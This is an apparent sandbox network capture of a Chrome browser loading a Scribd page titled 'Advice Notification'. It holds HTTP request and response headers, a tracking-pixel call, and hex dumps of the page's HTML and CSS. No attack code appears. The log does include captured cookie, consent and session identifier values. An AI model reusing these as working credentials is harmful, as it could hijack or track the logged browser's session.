                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1536OUTGET /j?dtstmp=1733522365790&aid=a-05td&se=e30&duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&tv=v3.5.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&us_privacy=1-N-&wpn=lc-bundle&wpv=v3.5.0&cd=.scribd.com&c=PHRpdGxlPkFkdmljZSBOb3RpZmljYXRpb24gfCBQREY8L3RpdGxlPjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBZHZpY2UgTm90aWZpY2F0aW9uIC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgdmlldyBwcmVzZW50YXRpb24gc2xpZGVzIG9ubGluZS4gQWR2aWNlIE5vdGlmaWNhdGlvbiI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODAxNTE5MjkxL0FkdmljZS1Ob3RpZmljYXRpb24iPjx0aXRsZSBpZD0iNmEzMGQ0MDktNGUyNi00ODQyLWFkNzEtYjFhZDA4ZDE5MzczIj48IS0tLS0-Q2xvc2UgdGhpcyBkaWFsb2c8IS0tLS0-PC90aXRsZT48dGl0bGUgaWQ9ImNkMjJlYmIwLTc2ZTctNDkxOS04OGUzLTViMmE2MWM1MDM4OCI-PCEtLS0tPkNsb3NlIENvb2tpZSBQcmVmZXJlbmNlczwhLS0tLT48L3RpdGxlPg&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4&n3pc=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: rp.liadm.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        X-Pixel-Event-Id: df0b234c-8621-4d47-b91b-d4ca0cc3c10a
                                                                                                                                                                                                                                                                                                                                                                                        set-cookie: lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a; Max-Age=63072000; Expires=Sun, 06 Dec 2026 21:59:30 GMT; Path=/j; Domain=.liadm.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-methods: GET
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-expose-headers: *
                                                                                                                                                                                                                                                                                                                                                                                        access-control-max-age: 86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC13INData Raw: 7b 22 62 61 6b 65 72 73 22 3a 5b 5d 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"bakers":[]}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        58192.168.2.1649793151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC2604OUTGET /document/801519291/Advice-Notification HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC1259INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1778653
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"52b29c8b399807d27da73010872b1650"
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 14:58:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Link: <https://cmp.osano.com/AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en>; rel=preload; as=script; critical, </options/exposed_to_client.js>; rel=preload; as=script; critical
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 259
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: db219cc9060b17c20d2ba1ee52580c08676d55adbd381590105cf12cf2c9e88e
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.252145
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 17
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740062-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522371.298180,VS0,VE4
                                                                                                                                                                                                                                                                                                                                                                                        Vary: X-Language-Locale,X-Bot,X-Fastly-Mobile,Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC16384INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 73 63 72 69 62 64 2d 63 6f 6d 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 61 70 70 73 2f 73 63 72 69 62 64 2d 63 6f 6d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><head prefix="og: http://ogp.me/ns# scribd-com: http://ogp.me/ns/apps/scribd-com
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC16384INData Raw: 63 6c 65 5f 66 69 6c 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 38 62 22 7d 2e 69 63 6f 6e 2d 69 63 5f 77 61 72 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 38 63 22 7d 2e 69 63 6f 6e 2d 69 63 5f 65 6d 61 69 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 38 64 22 7d 2e 69 63 6f 6e 2d 69 63 5f 75 70 6c 6f 61 64 5f 77 69 74 68 5f 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 38 65 22 7d 2e 69 63 6f 6e 2d 69 63 5f 74 77 69 74 74 65 72 31 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 38 66 22 7d 2e 69 63 6f 6e 2d 69 63 5f 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 39 30 22 7d 2e 69 63 6f 6e 2d 69 63 5f 70 69 6e 74 65 72 65 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cle_fill:before{content:"\e98b"}.icon-ic_warn:before{content:"\e98c"}.icon-ic_email:before{content:"\e98d"}.icon-ic_upload_with_line:before{content:"\e98e"}.icon-ic_twitter1:before{content:"\e98f"}.icon-ic_facebook:before{content:"\e990"}.icon-ic_pinteres
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC16384INData Raw: 61 64 64 69 6e 67 3a 30 20 34 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 37 36 31 37 61 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 68 65 69 67 68 74 3a 36 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 36 36 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 7d 2e 74 6f 6f 6c 62 61 72 5f 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 2e 72 65 6e 65 77 5f 62 74 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 7d 2e 74 6f 6f 6c 62 61 72 5f 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 72 65 6e 65 77 61 6c 5f 6e 61 67 20 2e 72 65 6e 65 77 61 6c 5f 66 6f 72 6d 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 73 63 72 69 62 64 5f 62 6c 75 65 5f 6c 6f 6e 67 5f 6c 6f 67 6f 2c 2e 73 63 72 69 62 64 5f 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: adding:0 45px;background:#57617a;color:#fff;height:64px;line-height:66px;text-align:center;white-space:normal}.toolbar_notification .renew_btn{margin-left:20px}.toolbar_notification.renewal_nag .renewal_form{display:inline}.scribd_blue_long_logo,.scribd_w
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC16384INData Raw: 73 2f 66 6f 6e 74 73 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 2f 72 65 67 75 6c 61 72 2f 73 6f 75 72 63 65 5f 73 61 6e 73 5f 70 72 6f 5f 72 65 67 75 6c 61 72 2e 31 61 35 66 62 37 31 61 2e 73 76 67 23 73 6f 75 72 63 65 73 61 6e 73 70 72 6f 29 20 66 6f 72 6d 61 74 28 22 73 76 67 22 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 66 61 6c 6c 62 61 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 6f 75 72 63 65 20 53 61 6e 73 20 50 72 6f 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 73 6f 75 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s/fonts/source_sans_pro/regular/source_sans_pro_regular.1a5fb71a.svg#sourcesanspro) format("svg")}@font-face{font-display:fallback;font-family:Source Sans Pro;font-style:normal;font-weight:400;src:url(https://s-f.scribdassets.com/webpack/assets/fonts/sour
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC16384INData Raw: 70 6c 61 79 3a 66 61 6c 6c 62 61 63 6b 3b 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 73 6f 75 72 63 65 5f 73 65 72 69 66 5f 70 72 6f 2f 6c 69 67 68 74 2f 73 6f 75 72 63 65 5f 73 65 72 69 66 5f 70 72 6f 5f 6c 69 67 68 74 2e 67 72 65 65 6b 2d 65 78 74 2e 36 65 35 35 39 37 64 65 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 75 2b 31 66 3f 3f 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 6f 75 72 63 65 20 53 65 72 69 66 20 50 72 6f 22 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: play:fallback;src:url(https://s-f.scribdassets.com/webpack/assets/fonts/source_serif_pro/light/source_serif_pro_light.greek-ext.6e5597de.woff2) format("woff2");unicode-range:u+1f??}@font-face{font-family:"Source Serif Pro";font-style:normal;font-weight:30
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC16384INData Raw: 73 2f 66 6f 6e 74 73 2f 61 72 69 7a 6f 6e 61 5f 73 61 6e 73 2f 72 65 67 75 6c 61 72 2f 61 72 69 7a 6f 6e 61 5f 73 61 6e 73 5f 72 65 67 75 6c 61 72 2e 61 35 36 64 62 39 64 33 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 61 72 69 7a 6f 6e 61 5f 73 61 6e 73 2f 72 65 67 75 6c 61 72 2f 61 72 69 7a 6f 6e 61 5f 73 61 6e 73 5f 72 65 67 75 6c 61 72 2e 34 32 64 31 31 36 66 33 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 66 61 6c 6c 62 61 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s/fonts/arizona_sans/regular/arizona_sans_regular.a56db9d3.woff2) format("woff2"),url(https://s-f.scribdassets.com/webpack/assets/fonts/arizona_sans/regular/arizona_sans_regular.42d116f3.woff) format("woff")}@font-face{font-display:fallback;font-family:Ar
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC16384INData Raw: 6d 6e 3a 61 75 74 6f 2f 73 70 61 6e 20 34 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 32 34 38 70 78 29 7b 2e 47 72 69 64 43 6f 6c 75 6d 6e 2d 6d 6f 64 75 6c 65 5f 65 78 74 65 6e 64 65 64 5f 78 6c 5f 35 5f 5f 71 6d 77 4e 38 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 61 75 74 6f 2f 73 70 61 6e 20 35 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 32 34 38 70 78 29 7b 2e 47 72 69 64 43 6f 6c 75 6d 6e 2d 6d 6f 64 75 6c 65 5f 65 78 74 65 6e 64 65 64 5f 78 6c 5f 36 5f 5f 30 70 73 49 57 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 61 75 74 6f 2f 73 70 61 6e 20 36 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 32 34 38 70 78 29 7b 2e 47 72 69 64 43 6f 6c 75 6d 6e 2d 6d 6f 64 75 6c 65 5f 65 78 74 65 6e 64 65 64 5f 78 6c 5f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mn:auto/span 4}}@media (max-width:1248px){.GridColumn-module_extended_xl_5__qmwN8{grid-column:auto/span 5}}@media (max-width:1248px){.GridColumn-module_extended_xl_6__0psIW{grid-column:auto/span 6}}@media (max-width:1248px){.GridColumn-module_extended_xl_
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC16384INData Raw: 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 67 72 6f 77 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 53 65 61 72 63 68 46 6f 72 6d 2d 6d 6f 64 75 6c 65 5f 66 6f 63 75 73 65 64 5f 5f 66 72 6a 7a 57 20 2e 53 65 61 72 63 68 46 6f 72 6d 2d 6d 6f 64 75 6c 65 5f 69 6e 70 75 74 57 72 61 70 70 65 72 5f 5f 36 69 49 4b 62 20 2e 53 65 61 72 63 68 46 6f 72 6d 2d 6d 6f 64 75 6c 65 5f 63 6c 6f 73 65 52 65 6c 61 74 65 64 53 65 61 72 63 68 42 75 74 74 6f 6e 5f 5f 63 39 4c 53 49 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 2e 53 65 61 72 63 68 46 6f 72 6d 2d 6d 6f 64 75 6c 65 5f 66 6f 63 75 73 65 64 5f 5f 66 72 6a 7a 57 20 2e 53 65 61 72 63 68 46 6f 72 6d 2d 6d 6f 64 75 6c 65 5f 69 6e 70 75 74 57 72 61 70 70 65 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: y:flex;flex:grow;justify-content:center}.SearchForm-module_focused__frjzW .SearchForm-module_inputWrapper__6iIKb .SearchForm-module_closeRelatedSearchButton__c9LSI{display:block;flex-grow:1}.SearchForm-module_focused__frjzW .SearchForm-module_inputWrapper
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC16384INData Raw: 63 6b 5f 63 65 55 78 44 66 7b 6c 65 66 74 3a 76 61 72 28 2d 2d 70 61 64 64 6c 65 2d 78 2d 6f 66 66 73 65 74 29 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 31 32 70 78 29 7b 2e 43 61 72 6f 75 73 65 6c 2d 6d 6f 64 75 6c 65 5f 70 61 64 64 6c 65 42 61 63 6b 5f 63 65 55 78 44 66 7b 6c 65 66 74 3a 2d 31 36 70 78 7d 7d 2e 43 61 72 6f 75 73 65 6c 2d 6d 6f 64 75 6c 65 5f 70 61 64 64 6c 65 46 6f 72 77 61 72 64 5f 74 4b 79 42 73 50 7b 72 69 67 68 74 3a 76 61 72 28 2d 2d 70 61 64 64 6c 65 2d 78 2d 6f 66 66 73 65 74 29 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 31 32 70 78 29 7b 2e 43 61 72 6f 75 73 65 6c 2d 6d 6f 64 75 6c 65 5f 70 61 64 64 6c 65 46 6f 72 77 61 72 64 5f 74 4b 79 42 73 50 7b 72 69 67 68 74 3a 36 70 78 7d 7d 2e 43 61 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ck_ceUxDf{left:var(--paddle-x-offset)}@media (max-width:512px){.Carousel-module_paddleBack_ceUxDf{left:-16px}}.Carousel-module_paddleForward_tKyBsP{right:var(--paddle-x-offset)}@media (max-width:512px){.Carousel-module_paddleForward_tKyBsP{right:6px}}.Car
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC16384INData Raw: 42 6f 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 39 32 30 70 78 29 7b 2e 47 72 69 64 43 6f 6c 75 6d 6e 2d 6d 6f 64 75 6c 65 5f 68 69 64 65 5f 62 65 6c 6f 77 5f 78 6c 34 5f 62 59 4e 46 52 4e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 36 30 31 70 78 29 7b 2e 47 72 69 64 43 6f 6c 75 6d 6e 2d 6d 6f 64 75 6c 65 5f 68 69 64 65 5f 61 62 6f 76 65 5f 78 6c 33 5f 64 6e 34 54 71 6b 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 36 30 30 70 78 29 7b 2e 47 72 69 64 43 6f 6c 75 6d 6e 2d 6d 6f 64 75 6c 65 5f 68 69 64 65 5f 62 65 6c 6f 77 5f 78 6c 33 5f 63 63 4c 41 55 37 7b 64 69 73 70 6c 61 79 3a 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Bo{display:none}}@media (max-width:1920px){.GridColumn-module_hide_below_xl4_bYNFRN{display:none}}@media (min-width:1601px){.GridColumn-module_hide_above_xl3_dn4Tqk{display:none}}@media (max-width:1600px){.GridColumn-module_hide_below_xl3_ccLAU7{display:n


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        59192.168.2.1649794151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC645OUTGET /img/word_document/322011391/149x198/14bbaf98d5/1733344475?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 7206
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "dOJ+AoSZZ6anovO2K5vGHH99ItYZoY2nIp1DGxk7bOk"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=8935 idim=149x198 ifmt=png ofsz=7206 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010248
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 55
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:31 GMT
